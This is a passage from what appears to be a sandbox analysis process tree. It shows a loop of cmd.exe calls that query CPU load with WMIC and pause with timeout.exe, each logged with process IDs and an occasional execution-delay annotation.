      4⤵
      PID:1180
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4184
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2248
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1508
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1072
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3024
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2992
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4172
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4960
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4584
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1388
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2076
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2000
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2988
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4660
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3096
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1340
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1992
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2952
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2152
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2900
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:5112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4720
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2576
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4472
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1488
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2740
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1600
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4716
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:448
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:940
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3504
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4308
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2988
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4380
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5040
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1944
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4836
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4660
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4976
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:808
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3724
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4452
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:860
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:672
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4948
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3240
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2724
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2672
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1468
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3900
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1464
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2528
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1892
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2740
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2408
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1508
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2936
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1216
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1656
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:180
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1608
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4836
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4884
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4492
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1756
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4272
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3292
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1912
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
